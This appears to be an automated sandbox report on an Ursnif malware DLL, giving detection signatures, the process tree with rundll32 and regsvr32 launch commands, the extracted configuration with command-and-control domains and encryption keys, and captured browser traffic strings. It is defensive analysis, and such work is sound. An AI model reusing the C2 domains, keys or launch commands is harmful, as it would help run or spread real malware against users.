Loading ...

Play interactive tourEdit tour

Analysis Report racial.drc

Overview

General Information

Sample Name:racial.drc (renamed file extension from drc to dll)
Analysis ID:429317
MD5:a185444ff58e6261abff03fa320a6fa6
SHA1:d5e5510107e6f85a0603f7d5058eff5c0f887c38
SHA256:77e706f98b1e4fe48a4a1631b27529dc587aeab2d187322439d3b5a726da2f80
Tags:dllsansisc
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Ursnif
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5968 cmdline: loaddll32.exe 'C:\Users\user\Desktop\racial.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5724 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5456 cmdline: rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5476 cmdline: regsvr32.exe /s C:\Users\user\Desktop\racial.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5932 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 6288 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5932 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 4492 cmdline: rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "XcnD2ewKHEUCtK1f+aLgHrNg0ax+yJaEQWHiRnybZBp8+uodMhISWv4leSoo8qv94Yp7nN7eHJ+Fwyn8u61qqsKGP3Tc6znVTKRLbzT9WPZrMuSsdt/HztnVs/3QyB9AYrjoSg/9XVCi/ZMXWvk+/9j1f+VWv2RCJlTSph0Uzve7FtxnOT0xBl6o7ggjmqCVLob3OKmyZthO+zptVxFaL1Wnba2K0H5ySB9eH0SzymLsPN5KihXQerCvcZD5sVgXqV1Djx7J0lE1iMtQGxg1y8vjo/XtpKTIx/8piDl5mkVVyl+2UAXptU9jjxuCv3gZSzWsmQVsHERv19M1JbQKUMsIbdhZipSpKsasQY04yK4=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "1500", "server": "580", "serpent_key": "N6Xp8oSBB81TOAN9", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000003.00000003.415227072.0000000000BE0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000005.00000003.422187658.0000000000CA0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000002.00000003.416030863.0000000003030000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.3.rundll32.exe.ca8d03.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            0.2.loaddll32.exe.6ddf0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.2.regsvr32.exe.6ddf0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                5.2.rundll32.exe.6ddf0000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.regsvr32.exe.3038d03.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    Click to see the 3 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 00000000.00000003.425497908.0000000001390000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "XcnD2ewKHEUCtK1f+aLgHrNg0ax+yJaEQWHiRnybZBp8+uodMhISWv4leSoo8qv94Yp7nN7eHJ+Fwyn8u61qqsKGP3Tc6znVTKRLbzT9WPZrMuSsdt/HztnVs/3QyB9AYrjoSg/9XVCi/ZMXWvk+/9j1f+VWv2RCJlTSph0Uzve7FtxnOT0xBl6o7ggjmqCVLob3OKmyZthO+zptVxFaL1Wnba2K0H5ySB9eH0SzymLsPN5KihXQerCvcZD5sVgXqV1Djx7J0lE1iMtQGxg1y8vjo/XtpKTIx/8piDl5mkVVyl+2UAXptU9jjxuCv3gZSzWsmQVsHERv19M1JbQKUMsIbdhZipSpKsasQY04yK4=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "1500", "server": "580", "serpent_key": "N6Xp8oSBB81TOAN9", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
                    Source: racial.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49718 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49733 version: TLS 1.2
                    Source: racial.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: c:\Steam\Egg\332\people\Spec\Road.pdb source: loaddll32.exe, 00000000.00000002.481246948.000000006DE49000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.481855502.000000006DE49000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.485085949.000000006DE49000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.481827060.000000006DE49000.00000002.00020000.sdmp, racial.dll
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6DE40D7A FindFirstFileExW,0_2_6DE40D7A
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6DE40D7A FindFirstFileExW,2_2_6DE40D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6DE40D7A FindFirstFileExW,3_2_6DE40D7A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6DE40D7A FindFirstFileExW,5_2_6DE40D7A
                    Source: Joe Sandbox ViewIP Address: 104.20.185.68 104.20.185.68
                    Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
                    Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
                    Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
                    Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                    Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                    Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                    Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x0b6448b9,0x01d758f2</date><accdate>0x0b6448b9,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                    Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x0bee910d,0x01d758f2</date><accdate>0x0bee910d,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                    Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x0bee910d,0x01d758f2</date><accdate>0x0bee910d,0x01d758f2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                    Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
                    Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
                    Source: unknownDNS traffic detected: queries for: www.msn.com
                    Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
                    Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
                    Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
                    Source: {2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                    Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
                    Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
                    Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
                    Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
                    Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
                    Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
                    Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
                    Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
                    Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
                    Source: {2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
                    Source: {2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                    Source: {2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                    Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                    Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1622745025&amp;rver
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1622745025&amp;rver=7.0.6730.0&am
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1622745026&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1622745025&amp;rver=7.0.6730.0&amp;w
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
                    Source: {2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
                    Source: imagestore.dat.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKFMgy.img?h=368&amp;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXITZ.img?h=27&amp;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
                    Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=htt
                    Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
                    Source: {2E23CC93-C4E5-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
                    Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
